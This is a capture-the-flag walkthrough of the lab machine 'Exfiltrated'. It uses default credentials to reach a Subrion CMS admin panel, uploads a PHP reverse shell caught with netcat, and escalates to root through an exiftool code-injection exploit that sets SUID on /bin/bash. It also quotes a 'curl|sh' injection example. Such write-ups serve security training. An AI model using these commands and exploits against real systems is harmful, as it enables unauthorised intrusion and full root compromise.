Skip to content

PG - Exfiltrated Walkthrough


  • Use Nmap to get the list of services running on the target.
  • On web app use default credentials to login.
  • Exploit CMS which is vulnerable to authenticated RCE.
  • Exploit Cronjob to escalate privilege to root.


As usual start with a basic port scan of a target machine.

Port Scan

$ nmap $ip -sVC -oN nmapInitial.txt -Pn


Not shown: 998 closed ports
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 c1:99:4b:95:22:25:ed:0f:85:20:d3:63:b4:48:bb:cf (RSA)
|   256 0f:44:8b:ad:ad:95:b8:22:6a:f0:36:ac:19:d0:0e:f3 (ECDSA)
|_  256 32:e1:2a:6c:cc:7c:e6:3e:23:f4:80:8d:33:ce:9b:3a (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
| http-robots.txt: 7 disallowed entries 
| /backup/ /cron/? /front/ /install/ /panel/ /tmp/ 
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to http://exfiltrated.offsec/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 43.71 seconds
Since, HTTP service is running, lets start enumerating it for any vulnerabilties we can exploit.

Web App Enumeration

First update your /etc/hosts file so you can access exfiltrated.offsec. exfiltrated.offsec
# change ip accordingly

Once you are done updating, browse to the above domain.


Landing Page

There is login page. Never forget to try bunch of default credentials.


Login Page

You can successfully login onto this using admin:admin credentials. You can find the version of CMS the web application is using.


CMS Version


Initial Foothold:

This version of Subrion CMS is vulnerable to authenticated RCE. According to the disclosure, we can upload php script with extension phar and pht.

Upload PHP-REVERSE-SHELL script in /panel/uploads:

Upload Shell

I used the shell which is readily available in kali linux i.e /usr/share/webshells/php/php-reverse-shell.php. Just change the IP, PORT and extension.

Now start your netcat listener, and go to /uploads/<shell_name> to execute the script.

$ nc -nvlp 80
listening on [any] 80 ...
connect to [] from (UNKNOWN) [] 37140
Linux exfiltrated 5.4.0-74-generic #83-Ubuntu SMP Sat May 8 02:35:39 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
 16:14:41 up  1:08,  0 users,  load average: 0.03, 0.01, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
$ which python3
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
Don't forget to upgrade your shell to interactive one for more stability.

Privilege Escalation

We get the shell as user www-data. Check crontabs to see if there is any misconfiguration we can exploit to escalate our privileges.

www-data@exfiltrated:/$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.


# Example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  * user-name command to be executed
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
* *     * * *   root    bash /opt/

We can see that one cronjob is running a bash script as root. Check the content of the script if possible.

www-data@exfiltrated:/$ cat /opt/
cat /opt/
#! /bin/bash
#07/06/18 A BASH script to collect EXIF metadata 

echo -ne "\\n metadata directory cleaned! \\n\\n"


FILE=`openssl rand -hex 5`

echo -ne "\\n Processing EXIF metadata now... \\n\\n"
ls $IMAGES | grep "jpg" | while read filename; 
    exiftool "$IMAGES/$filename" >> $LOGFILE 

echo -ne "\\n\\n Processing is finished! \\n\\n\\n"
It is looking for file with extension jpg in /var/www/html/subrion/ uploads and running exiftool on that file.

Check the version of exiftool

www-data@exfiltrated:/$ exiftool -ver
exiftool -ver
Installed version of exiftool is vulnerable to arbitrary code execution. Since its running with a privilege of root. Any code we inject will be executed with root privilege.

Information about vulnerability:

Download the exploit from:

Create a malicious file using the exploit.

$ ./ "chmod +s /bin/bash"                                           
Usage ./ <cmd to inject>                                                    
        Note: if your cmd contains unix special characters use quote!                                       
        EG: ./ "curl|sh"                                       
This poc generates an image file (notevil.jpg) to be proccessed by vulnerable exiftool.
And requires DjVuLibre to be installed and in PATH         
[+] Preparing annotation file.
[+] Creating image file with: djvumake notevil.jpg INFO=0,0 BGjp=/dev/null ANTa=ant.out 
[+] notevil.jpg created.

I am simply trying to set SUID permission on /bin/bash for Priviletge Escalation. You can try to get reverse shell instead.

Now we need to transfer the malicious image to target machine. I will be using a basic http.server to do so.

# In your machine, start a basic http.server using python
$ python3 -m http.server 8080
Serving HTTP on port 8080 ( ...

# now download the image in target machine using wget
Connecting to connected.
HTTP request sent, awaiting response... 200 OK
Length: 122 [image/jpeg]
Saving to: ‘notevil.jpg’                   
notevil.jpg         100%[===================>]     122  --.-KB/s    in 0s 
2021-09-08 14:54:21 (18.0 MB/s) - ‘notevil.jpg’ saved [122/122]
Now, move the image to /var/www/html/subrion/uploads and wait for cronjob to execute.

www-data@exfiltrated:/var/www/html/subrion/uploads$ ls -la /bin/bash                                                                                                   
ls -la /bin/bash                         
-rwsr-sr-x 1 root root 1183448 Jun 18  2020 /bin/bash
Once done, just run bash -p to get the root shell.
www-data@exfiltrated:/var/www/html/subrion/uploads$ bash -p
bash -p                                  
bash-5.0# id                             
uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) groups=0(root),33(www-data)
bash-5.0# whoami                          
Get those flags

bash-5.0# cat proof.txt
cat proof.txt                            
bash-5.0# find / -type f -name local.txt 2>/dev/null
find / -type f -name local.txt 2>/dev/null
bash-5.0# cat /home/coaran/local.txt
cat /home/coaran/local.txt